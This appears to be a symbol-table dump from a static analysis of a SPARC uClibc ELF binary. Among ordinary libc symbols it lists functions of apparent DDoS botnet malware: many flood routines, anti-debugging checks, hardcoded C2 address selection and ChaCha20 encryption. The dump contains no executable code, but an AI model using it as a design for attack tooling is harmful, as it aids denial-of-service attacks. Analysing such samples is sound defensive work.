                                                                      __GI_setsockopt.symtab0x1e80c44FUNC<unknown>HIDDEN2
                                                                      __GI_setstate_r.symtab0x203a0276FUNC<unknown>HIDDEN2
                                                                      __GI_sigaction.symtab0x221bc264FUNC<unknown>HIDDEN2
                                                                      __GI_sigaddset.symtab0x1e86472FUNC<unknown>HIDDEN2
                                                                      __GI_sigemptyset.symtab0x1e8ac16FUNC<unknown>HIDDEN2
                                                                      __GI_signal.symtab0x1e8c4168FUNC<unknown>HIDDEN2
                                                                      __GI_sigprocmask.symtab0x19fc0172FUNC<unknown>HIDDEN2
                                                                      __GI_sleep.symtab0x21674336FUNC<unknown>HIDDEN2
                                                                      __GI_snprintf.symtab0x1a64c48FUNC<unknown>HIDDEN2
                                                                      __GI_socket.symtab0x1e83836FUNC<unknown>HIDDEN2
                                                                      __GI_sprintf.symtab0x2342c52FUNC<unknown>HIDDEN2
                                                                      __GI_srandom_r.symtab0x201bc232FUNC<unknown>HIDDEN2
                                                                      __GI_sscanf.symtab0x1b8c848FUNC<unknown>HIDDEN2
                                                                      __GI_strchr.symtab0x267b4524FUNC<unknown>HIDDEN2
                                                                      __GI_strchrnul.symtab0x26b80260FUNC<unknown>HIDDEN2
                                                                      __GI_strcmp.symtab0x1d378648FUNC<unknown>HIDDEN2
                                                                      __GI_strcoll.symtab0x1d378648FUNC<unknown>HIDDEN2
                                                                      __GI_strcpy.symtab0x1d668804FUNC<unknown>HIDDEN2
                                                                      __GI_strcspn.symtab0x26c8460FUNC<unknown>HIDDEN2
                                                                      __GI_strlen.symtab0x1d9f4120FUNC<unknown>HIDDEN2
                                                                      __GI_strncmp.symtab0x26cc0244FUNC<unknown>HIDDEN2
                                                                      __GI_strnlen.symtab0x1da6c244FUNC<unknown>HIDDEN2
                                                                      __GI_strrchr.symtab0x269c0192FUNC<unknown>HIDDEN2
                                                                      __GI_strspn.symtab0x26db484FUNC<unknown>HIDDEN2
                                                                      __GI_strstr.symtab0x1db60288FUNC<unknown>HIDDEN2
                                                                      __GI_strtol.symtab0x204cc20FUNC<unknown>HIDDEN2
                                                                      __GI_sysconf.symtab0x20b3c1140FUNC<unknown>HIDDEN2
                                                                      __GI_tcgetattr.symtab0x26e28108FUNC<unknown>HIDDEN2
                                                                      __GI_time.symtab0x1a0cc40FUNC<unknown>HIDDEN2
                                                                      __GI_times.symtab0x2299040FUNC<unknown>HIDDEN2
                                                                      __GI_ungetc.symtab0x27dec480FUNC<unknown>HIDDEN2
                                                                      __GI_unlink.symtab0x1a0fc88FUNC<unknown>HIDDEN2
                                                                      __GI_vfscanf.symtab0x248481992FUNC<unknown>HIDDEN2
                                                                      __GI_vsnprintf.symtab0x1a67c164FUNC<unknown>HIDDEN2
                                                                      __GI_vsscanf.symtab0x1b8f8112FUNC<unknown>HIDDEN2
                                                                      __GI_wcrtomb.symtab0x22f8076FUNC<unknown>HIDDEN2
                                                                      __GI_wcsnrtombs.symtab0x22ff0192FUNC<unknown>HIDDEN2
                                                                      __GI_wcsrtombs.symtab0x22fcc28FUNC<unknown>HIDDEN2
                                                                      __GI_write.symtab0x218c4132FUNC<unknown>HIDDEN2
                                                                      __JCR_END__.symtab0x3c0580OBJECT<unknown>DEFAULT9
                                                                      __JCR_LIST__.symtab0x3c0580OBJECT<unknown>DEFAULT9
                                                                      __app_fini.symtab0x3cacc4OBJECT<unknown>HIDDEN12
                                                                      __atexit_lock.symtab0x3c38824OBJECT<unknown>DEFAULT11
                                                                      __bss_start.symtab0x3c4940NOTYPE<unknown>DEFAULTSHN_ABS
                                                                      __check_one_fd.symtab0x21c9484FUNC<unknown>DEFAULT2
                                                                      __close.symtab0x217c4124FUNC<unknown>DEFAULT2
                                                                      __close_nocancel.symtab0x217d032FUNC<unknown>DEFAULT2
                                                                      __ctype_b.symtab0x3c2a44OBJECT<unknown>DEFAULT11
                                                                      __curbrk.symtab0x3f0344OBJECT<unknown>HIDDEN12
                                                                      __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      __do_global_ctors_aux.symtab0x285c00FUNC<unknown>DEFAULT2
                                                                      __do_global_dtors_aux.symtab0x100d00FUNC<unknown>DEFAULT2
                                                                      __dso_handle.symtab0x3c2280OBJECT<unknown>HIDDEN11
                                                                      __environ.symtab0x3cac44OBJECT<unknown>DEFAULT12
                                                                      __errno_location.symtab0x1a5f036FUNC<unknown>DEFAULT2
                                                                      __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __exit_cleanup.symtab0x3c5744OBJECT<unknown>HIDDEN12
                                                                      __fcntl_nocancel.symtab0x19a5c196FUNC<unknown>DEFAULT2
                                                                      __fgetc_unlocked.symtab0x263b0344FUNC<unknown>DEFAULT2
                                                                      __fini_array_end.symtab0x3c0480NOTYPE<unknown>HIDDEN6
                                                                      __fini_array_start.symtab0x3c0480NOTYPE<unknown>HIDDEN6
                                                                      __fork.symtab0x210001088FUNC<unknown>DEFAULT2
                                                                      __fork_generation_pointer.symtab0x3f42c4OBJECT<unknown>HIDDEN12
                                                                      __fork_handlers.symtab0x3f4304OBJECT<unknown>HIDDEN12
                                                                      __fork_lock.symtab0x3c5784OBJECT<unknown>HIDDEN12
                                                                      __getdents.symtab0x224c4176FUNC<unknown>HIDDEN2
                                                                      __getdents64.symtab0x27b04304FUNC<unknown>HIDDEN2
                                                                      __getpagesize.symtab0x2260456FUNC<unknown>DEFAULT2
                                                                      __getpid.symtab0x2150488FUNC<unknown>DEFAULT2
                                                                      __glibc_strerror_r.symtab0x1dc8032FUNC<unknown>DEFAULT2
                                                                      __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      __init_array_end.symtab0x3c0480NOTYPE<unknown>HIDDEN6
                                                                      __init_array_start.symtab0x3c0480NOTYPE<unknown>HIDDEN6
                                                                      __init_scan_cookie.symtab0x2502c104FUNC<unknown>HIDDEN2
                                                                      __libc_accept.symtab0x1e54496FUNC<unknown>DEFAULT2
                                                                      __libc_close.symtab0x217c4124FUNC<unknown>DEFAULT2
                                                                      __libc_connect.symtab0x1e5c896FUNC<unknown>DEFAULT2
                                                                      __libc_disable_asynccancel.symtab0x219d4196FUNC<unknown>HIDDEN2
                                                                      __libc_enable_asynccancel.symtab0x21a98268FUNC<unknown>HIDDEN2
                                                                      __libc_errno.symtab0x04TLS<unknown>HIDDEN6
                                                                      __libc_fcntl.symtab0x19b20248FUNC<unknown>DEFAULT2
                                                                      __libc_fork.symtab0x210001088FUNC<unknown>DEFAULT2
                                                                      __libc_h_errno.symtab0x44TLS<unknown>HIDDEN6
                                                                      __libc_nanosleep.symtab0x228d472FUNC<unknown>DEFAULT2
                                                                      __libc_open.symtab0x21840132FUNC<unknown>DEFAULT2
                                                                      __libc_read.symtab0x21948132FUNC<unknown>DEFAULT2
                                                                      __libc_recv.symtab0x1e69492FUNC<unknown>DEFAULT2
                                                                      __libc_recvfrom.symtab0x1e6f096FUNC<unknown>DEFAULT2
                                                                      __libc_select.symtab0x19f0c84FUNC<unknown>DEFAULT2
                                                                      __libc_send.symtab0x1e75092FUNC<unknown>DEFAULT2
                                                                      __libc_sendto.symtab0x1e7ac96FUNC<unknown>DEFAULT2
                                                                      __libc_setup_tls.symtab0x27680636FUNC<unknown>DEFAULT2
                                                                      __libc_sigaction.symtab0x221bc264FUNC<unknown>DEFAULT2
                                                                      __libc_stack_end.symtab0x3cac04OBJECT<unknown>DEFAULT12
                                                                      __libc_write.symtab0x218c4132FUNC<unknown>DEFAULT2
                                                                      __lll_lock_wait_private.symtab0x21458172FUNC<unknown>HIDDEN2
                                                                      __malloc_consolidate.symtab0x1fa00436FUNC<unknown>HIDDEN2
                                                                      __malloc_largebin_index.symtab0x1ea74144FUNC<unknown>DEFAULT2
                                                                      __malloc_lock.symtab0x3c2ac24OBJECT<unknown>DEFAULT11
                                                                      __malloc_state.symtab0x3f0b4888OBJECT<unknown>DEFAULT12
                                                                      __malloc_trim.symtab0x1f950176FUNC<unknown>DEFAULT2
                                                                      __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      __open.symtab0x21840132FUNC<unknown>DEFAULT2
                                                                      __open_nocancel.symtab0x2184c32FUNC<unknown>DEFAULT2
                                                                      __pagesize.symtab0x3cac84OBJECT<unknown>DEFAULT12
                                                                      __preinit_array_end.symtab0x3c0480NOTYPE<unknown>HIDDEN6
                                                                      __preinit_array_start.symtab0x3c0480NOTYPE<unknown>HIDDEN6
                                                                      __progname.symtab0x3c3a44OBJECT<unknown>DEFAULT11
                                                                      __progname_full.symtab0x3c3a84OBJECT<unknown>DEFAULT11
                                                                      __psfs_do_numeric.symtab0x254a81524FUNC<unknown>HIDDEN2
                                                                      __psfs_do_numeric.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __psfs_parse_spec.symtab0x25164828FUNC<unknown>HIDDEN2
                                                                      __psfs_parse_spec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __pthread_initialize_minimal.symtab0x278fc24FUNC<unknown>DEFAULT2
                                                                      __pthread_mutex_init.symtab0x21bac8FUNC<unknown>DEFAULT2
                                                                      __pthread_mutex_lock.symtab0x21ba48FUNC<unknown>DEFAULT2
                                                                      __pthread_mutex_trylock.symtab0x21ba48FUNC<unknown>DEFAULT2
                                                                      __pthread_mutex_unlock.symtab0x21ba48FUNC<unknown>DEFAULT2
                                                                      __pthread_return_0.symtab0x21ba48FUNC<unknown>DEFAULT2
                                                                      __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      __read.symtab0x21948132FUNC<unknown>DEFAULT2
                                                                      __read_nocancel.symtab0x2195432FUNC<unknown>DEFAULT2
                                                                      __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                      __rt_sigreturn_stub.symtab0x2219416FUNC<unknown>DEFAULT2
                                                                      __rtld_fini.symtab0x3cad04OBJECT<unknown>HIDDEN12
                                                                      __scan_cookie.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __scan_getc.symtab0x25094120FUNC<unknown>HIDDEN2
                                                                      __scan_ungetc.symtab0x2510c80FUNC<unknown>HIDDEN2
                                                                      __sigaddset.symtab0x1e99444FUNC<unknown>DEFAULT2
                                                                      __sigdelset.symtab0x1e9c044FUNC<unknown>DEFAULT2
                                                                      __sigismember.symtab0x1e96c40FUNC<unknown>DEFAULT2
                                                                      __sigjmp_save.symtab0x26f9060FUNC<unknown>HIDDEN2
                                                                      __sigreturn_stub.symtab0x221a416FUNC<unknown>DEFAULT2
                                                                      __sigsetjmp.symtab0x2233828FUNC<unknown>DEFAULT2
                                                                      __socketcall.symtab0x2235c92FUNC<unknown>HIDDEN2
                                                                      __socketcall.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __sparc32_atomic_locks.symtab0x3c52064OBJECT<unknown>HIDDEN12
                                                                      __stdin.symtab0x3c3bc4OBJECT<unknown>DEFAULT11
                                                                      __stdio_READ.symtab0x28194104FUNC<unknown>HIDDEN2
                                                                      __stdio_WRITE.symtab0x28204248FUNC<unknown>HIDDEN2
                                                                      __stdio_adjust_position.symtab0x28304248FUNC<unknown>HIDDEN2
                                                                      __stdio_fwrite.symtab0x2390c320FUNC<unknown>HIDDEN2
                                                                      __stdio_rfill.symtab0x283fc56FUNC<unknown>HIDDEN2
                                                                      __stdio_seek.symtab0x284e852FUNC<unknown>HIDDEN2
                                                                      __stdio_trans2r_o.symtab0x2843c172FUNC<unknown>HIDDEN2
                                                                      __stdio_trans2w_o.symtab0x23c14272FUNC<unknown>HIDDEN2
                                                                      __stdio_wcommit.symtab0x23d2456FUNC<unknown>HIDDEN2
                                                                      __stdout.symtab0x3c3c04OBJECT<unknown>DEFAULT11
                                                                      __strtofpmax.symtab0x27254848FUNC<unknown>HIDDEN2
                                                                      __strtofpmax.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __syscall_error.symtab0x2216c40FUNC<unknown>HIDDEN2
                                                                      __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __syscall_nanosleep.symtab0x2287892FUNC<unknown>DEFAULT2
                                                                      __syscall_select.symtab0x19ea4104FUNC<unknown>DEFAULT2
                                                                      __sysv_signal.symtab0x1e9f4128FUNC<unknown>DEFAULT2
                                                                      __uClibc_fini.symtab0x21bec168FUNC<unknown>DEFAULT2
                                                                      __uClibc_init.symtab0x21ce892FUNC<unknown>DEFAULT2
                                                                      __uClibc_main.symtab0x21d441056FUNC<unknown>DEFAULT2
                                                                      __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __ubp_memchr.symtab0x26628280FUNC<unknown>DEFAULT2
                                                                      __uclibc_progname.symtab0x3c3a04OBJECT<unknown>HIDDEN11
                                                                      __write.symtab0x218c4132FUNC<unknown>DEFAULT2
                                                                      __write_nocancel.symtab0x218d032FUNC<unknown>DEFAULT2
                                                                      __xpg_strerror_r.symtab0x1dca8300FUNC<unknown>DEFAULT2
                                                                      __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      __xstat32_conv.symtab0x22a44132FUNC<unknown>HIDDEN2
                                                                      __xstat64_conv.symtab0x229b8140FUNC<unknown>HIDDEN2
                                                                      _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _atoi.symtab0x11ed888FUNC<unknown>DEFAULT2
                                                                      _bss_custom_printf_spec.symtab0x3c56010OBJECT<unknown>DEFAULT12
                                                                      _charpad.symtab0x1a72064FUNC<unknown>DEFAULT2
                                                                      _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _custom_printf_arginfo.symtab0x3f05c40OBJECT<unknown>HIDDEN12
                                                                      _custom_printf_handler.symtab0x3f08440OBJECT<unknown>HIDDEN12
                                                                      _custom_printf_spec.symtab0x3c2a84OBJECT<unknown>HIDDEN11
                                                                      _dl_aux_init.symtab0x2791c64FUNC<unknown>DEFAULT2
                                                                      _dl_nothread_init_static_tls.symtab0x2795c84FUNC<unknown>HIDDEN2
                                                                      _dl_phdr.symtab0x3f4544OBJECT<unknown>DEFAULT12
                                                                      _dl_phnum.symtab0x3f4584OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_dtv_gaps.symtab0x3f4481OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_dtv_slotinfo_list.symtab0x3f4444OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_generation.symtab0x3f44c4OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_max_dtv_idx.symtab0x3f43c4OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_setup.symtab0x2762492FUNC<unknown>DEFAULT2
                                                                      _dl_tls_static_align.symtab0x3f4384OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_static_nelem.symtab0x3f4504OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_static_size.symtab0x3f4404OBJECT<unknown>DEFAULT12
                                                                      _dl_tls_static_used.symtab0x3f4344OBJECT<unknown>DEFAULT12
                                                                      _edata.symtab0x3c4940NOTYPE<unknown>DEFAULTSHN_ABS
                                                                      _end.symtab0x3f4600NOTYPE<unknown>DEFAULTSHN_ABS
                                                                      _exit.symtab0x223c0128FUNC<unknown>DEFAULT2
                                                                      _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _fdgets.symtab0x11a10100FUNC<unknown>DEFAULT2
                                                                      _fini.symtab0x286080FUNC<unknown>DEFAULT3
                                                                      _fixed_buffers.symtab0x3caf88192OBJECT<unknown>DEFAULT12
                                                                      _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _fp_out_narrow.symtab0x1a760116FUNC<unknown>DEFAULT2
                                                                      _fpmaxtostr.symtab0x23f682032FUNC<unknown>HIDDEN2
                                                                      _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _init.symtab0x100b40FUNC<unknown>DEFAULT1
                                                                      _itoa.symtab0x11908264FUNC<unknown>DEFAULT2
                                                                      _load_inttype.symtab0x23d5c144FUNC<unknown>HIDDEN2
                                                                      _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _local_addr.symtab0x11a74132FUNC<unknown>DEFAULT2
                                                                      _memcpy.symtab0x1188c44FUNC<unknown>DEFAULT2
                                                                      _memset.symtab0x118e040FUNC<unknown>DEFAULT2
                                                                      _opennic_dns.symtab0x11bf4292FUNC<unknown>DEFAULT2
                                                                      _ppfs_init.symtab0x1af44156FUNC<unknown>HIDDEN2
                                                                      _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _ppfs_parsespec.symtab0x1b2841604FUNC<unknown>HIDDEN2
                                                                      _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _ppfs_prepargs.symtab0x1afe060FUNC<unknown>HIDDEN2
                                                                      _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _ppfs_setargs.symtab0x1b01c492FUNC<unknown>HIDDEN2
                                                                      _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _promoted_size.symtab0x1b210116FUNC<unknown>DEFAULT2
                                                                      _pthread_cleanup_pop_restore.symtab0x21bc036FUNC<unknown>DEFAULT2
                                                                      _pthread_cleanup_push_defer.symtab0x21bb412FUNC<unknown>DEFAULT2
                                                                      _random_cnc_addr_hardcode.symtab0x11d1836FUNC<unknown>DEFAULT2
                                                                      _random_domain.symtab0x11b2c140FUNC<unknown>DEFAULT2
                                                                      _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _setjmp.symtab0x2232c8FUNC<unknown>DEFAULT2
                                                                      _sigintr.symtab0x3f0ac8OBJECT<unknown>HIDDEN12
                                                                      _start.symtab0x101c456FUNC<unknown>DEFAULT2
                                                                      _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _stdio_fopen.symtab0x234681188FUNC<unknown>HIDDEN2
                                                                      _stdio_init.symtab0x23a54124FUNC<unknown>HIDDEN2
                                                                      _stdio_openlist.symtab0x3c3c44OBJECT<unknown>DEFAULT11
                                                                      _stdio_openlist_add_lock.symtab0x3cad812OBJECT<unknown>DEFAULT12
                                                                      _stdio_openlist_dec_use.symtab0x25ce8736FUNC<unknown>HIDDEN2
                                                                      _stdio_openlist_del_count.symtab0x3caf44OBJECT<unknown>DEFAULT12
                                                                      _stdio_openlist_del_lock.symtab0x3cae412OBJECT<unknown>DEFAULT12
                                                                      _stdio_openlist_use_count.symtab0x3caf04OBJECT<unknown>DEFAULT12
                                                                      _stdio_streams.symtab0x3c3c8204OBJECT<unknown>DEFAULT11
                                                                      _stdio_term.symtab0x23ad0316FUNC<unknown>HIDDEN2
                                                                      _stdio_user_locking.symtab0x3c3ac4OBJECT<unknown>DEFAULT11
                                                                      _stdlib_strto_l.symtab0x204e8472FUNC<unknown>HIDDEN2
                                                                      _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _stdlib_strto_ll.symtab0x26fd4632FUNC<unknown>HIDDEN2
                                                                      _stdlib_strto_ll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _store_inttype.symtab0x23dec60FUNC<unknown>HIDDEN2
                                                                      _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _strcat.symtab0x117ec76FUNC<unknown>DEFAULT2
                                                                      _strcpy.symtab0x1183884FUNC<unknown>DEFAULT2
                                                                      _strdup.symtab0x11f30136FUNC<unknown>DEFAULT2
                                                                      _string_syserrmsgs.symtab0x2a1882934OBJECT<unknown>HIDDEN4
                                                                      _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _stristr.symtab0x11e28176FUNC<unknown>DEFAULT2
                                                                      _strlen.symtab0x117bc48FUNC<unknown>DEFAULT2
                                                                      _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _uintmaxtostr.symtab0x23e28312FUNC<unknown>HIDDEN2
                                                                      _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _vfprintf_internal.symtab0x1a7dc1896FUNC<unknown>HIDDEN2
                                                                      _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      _zero.symtab0x118b840FUNC<unknown>DEFAULT2
                                                                      abort.symtab0x1fe28280FUNC<unknown>DEFAULT2
                                                                      abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      accept.symtab0x1e54496FUNC<unknown>DEFAULT2
                                                                      accept.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      actually_connected.symtab0x3c4bc4OBJECT<unknown>DEFAULT12
                                                                      anti_debug.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      antidebug.symtab0x10ce880FUNC<unknown>DEFAULT2
                                                                      atoi.symtab0x204b424FUNC<unknown>DEFAULT2
                                                                      atol.symtab0x204b424FUNC<unknown>DEFAULT2
                                                                      atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      attack_gudp_flood.symtab0x180c0276FUNC<unknown>DEFAULT2
                                                                      attack_parser.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      attack_registry.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      bcopy.symtab0x1baac12FUNC<unknown>DEFAULT2
                                                                      been_there_done_that.symtab0x3c5704OBJECT<unknown>DEFAULT12
                                                                      bind.symtab0x1e5a436FUNC<unknown>DEFAULT2
                                                                      bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      brk.symtab0x279b888FUNC<unknown>DEFAULT2
                                                                      brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      bsd_signal.symtab0x1e8c4168FUNC<unknown>DEFAULT2
                                                                      bzero.symtab0x1d11052FUNC<unknown>DEFAULT2
                                                                      c2_fd.symtab0x3c2344OBJECT<unknown>DEFAULT11
                                                                      call___do_global_ctors_aux.symtab0x285fc0FUNC<unknown>DEFAULT2
                                                                      call___do_global_dtors_aux.symtab0x1014c0FUNC<unknown>DEFAULT2
                                                                      call_frame_dummy.symtab0x101b80FUNC<unknown>DEFAULT2
                                                                      calloc.symtab0x1f498284FUNC<unknown>DEFAULT2
                                                                      calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      chacha20.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      chacha20_quarterround.symtab0x14804168FUNC<unknown>DEFAULT2
                                                                      chacha20_table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      chacha20_xor.symtab0x148ac1844FUNC<unknown>DEFAULT2
                                                                      chdir.symtab0x19c2088FUNC<unknown>DEFAULT2
                                                                      chdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      checksum_generic.symtab0x10d54100FUNC<unknown>DEFAULT2
                                                                      checksum_tcpudp.symtab0x10db8200FUNC<unknown>DEFAULT2
                                                                      clock.symtab0x1a61456FUNC<unknown>DEFAULT2
                                                                      clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      close.symtab0x217c4124FUNC<unknown>DEFAULT2
                                                                      closedir.symtab0x1a15c208FUNC<unknown>DEFAULT2
                                                                      closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      completed.4753.symtab0x3c4981OBJECT<unknown>DEFAULT12
                                                                      conn_table.symtab0x3c5144OBJECT<unknown>DEFAULT12
                                                                      connect.symtab0x1e5c896FUNC<unknown>DEFAULT2
                                                                      connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      connected.symtab0x3c4b84OBJECT<unknown>DEFAULT12
                                                                      crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      debugger_detected.symtab0x10d3828FUNC<unknown>DEFAULT2
                                                                      decpt_str.symtab0x292802OBJECT<unknown>DEFAULT4
                                                                      dirfd.symtab0x1a23456FUNC<unknown>DEFAULT2
                                                                      dirfd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      enable.symtab0x3c2384OBJECT<unknown>DEFAULT11
                                                                      enc.symtab0x3c5184OBJECT<unknown>DEFAULT12
                                                                      ensure_bind.symtab0x101fc324FUNC<unknown>DEFAULT2
                                                                      environ.symtab0x3cac44OBJECT<unknown>DEFAULT12
                                                                      errno.symtab0x04TLS<unknown>DEFAULT6
                                                                      errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      esi_fd.symtab0x3c2304OBJECT<unknown>DEFAULT11
                                                                      estridx.symtab0x2a0f8126OBJECT<unknown>DEFAULT4
                                                                      exit.symtab0x206c8168FUNC<unknown>DEFAULT2
                                                                      exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      exp10_table.symtab0x2ae0872OBJECT<unknown>DEFAULT4
                                                                      fails.symtab0x3c4b44OBJECT<unknown>DEFAULT12
                                                                      fclose.symtab0x230b8860FUNC<unknown>DEFAULT2
                                                                      fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fcntl.symtab0x19b20248FUNC<unknown>DEFAULT2
                                                                      fd_to_DIR.symtab0x1a274176FUNC<unknown>DEFAULT2
                                                                      fdopendir.symtab0x1a408176FUNC<unknown>DEFAULT2
                                                                      fflush_unlocked.symtab0x25fc8992FUNC<unknown>DEFAULT2
                                                                      fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fgetc.symtab0x25a9c320FUNC<unknown>DEFAULT2
                                                                      fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fgetc_unlocked.symtab0x263b0344FUNC<unknown>DEFAULT2
                                                                      fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fgets.symtab0x25bdc260FUNC<unknown>DEFAULT2
                                                                      fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fgets_unlocked.symtab0x26508160FUNC<unknown>DEFAULT2
                                                                      fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      flood_ack.symtab0x14fe01392FUNC<unknown>DEFAULT2
                                                                      flood_greip.symtab0x194d41300FUNC<unknown>DEFAULT2
                                                                      flood_handshake.symtab0x156282524FUNC<unknown>DEFAULT2
                                                                      flood_kill.symtab0x125a0108FUNC<unknown>DEFAULT2
                                                                      flood_parse.symtab0x123ac276FUNC<unknown>DEFAULT2
                                                                      flood_raknet.symtab0x18b101504FUNC<unknown>DEFAULT2
                                                                      flood_socket.symtab0x1639c1104FUNC<unknown>DEFAULT2
                                                                      flood_sockethold.symtab0x167ec268FUNC<unknown>DEFAULT2
                                                                      flood_start.symtab0x1260c964FUNC<unknown>DEFAULT2
                                                                      flood_std.symtab0x181d4700FUNC<unknown>DEFAULT2
                                                                      flood_stomp.symtab0x168f81684FUNC<unknown>DEFAULT2
                                                                      flood_syndata.symtab0x16f8c1556FUNC<unknown>DEFAULT2
                                                                      flood_tcpbypass.symtab0x16004920FUNC<unknown>DEFAULT2
                                                                      flood_udp_openvpn.symtab0x18490752FUNC<unknown>DEFAULT2
                                                                      flood_udpbypass.symtab0x17c301168FUNC<unknown>DEFAULT2
                                                                      flood_udpplain.symtab0x18780912FUNC<unknown>DEFAULT2
                                                                      flood_udpraw.symtab0x190f0996FUNC<unknown>DEFAULT2
                                                                      flood_wra.symtab0x175a01680FUNC<unknown>DEFAULT2
                                                                      floods.symtab0x3c4d44OBJECT<unknown>DEFAULT12
                                                                      floods_init.symtab0x129d01360FUNC<unknown>DEFAULT2
                                                                      floods_len.symtab0x3c4d01OBJECT<unknown>DEFAULT12
                                                                      fmt.symtab0x2adf020OBJECT<unknown>DEFAULT4
                                                                      fopen.symtab0x2341424FUNC<unknown>DEFAULT2
                                                                      fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fork.symtab0x210001088FUNC<unknown>DEFAULT2
                                                                      fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fork_handler_pool.symtab0x3c57c1348OBJECT<unknown>DEFAULT12
                                                                      fputs_unlocked.symtab0x1b96860FUNC<unknown>DEFAULT2
                                                                      fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      frame_dummy.symtab0x101580FUNC<unknown>DEFAULT2
                                                                      free.symtab0x1fbbc564FUNC<unknown>DEFAULT2
                                                                      free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      free_entries.symtab0x1127856FUNC<unknown>DEFAULT2
                                                                      fseek.symtab0x27dc836FUNC<unknown>DEFAULT2
                                                                      fseeko.symtab0x27dc836FUNC<unknown>DEFAULT2
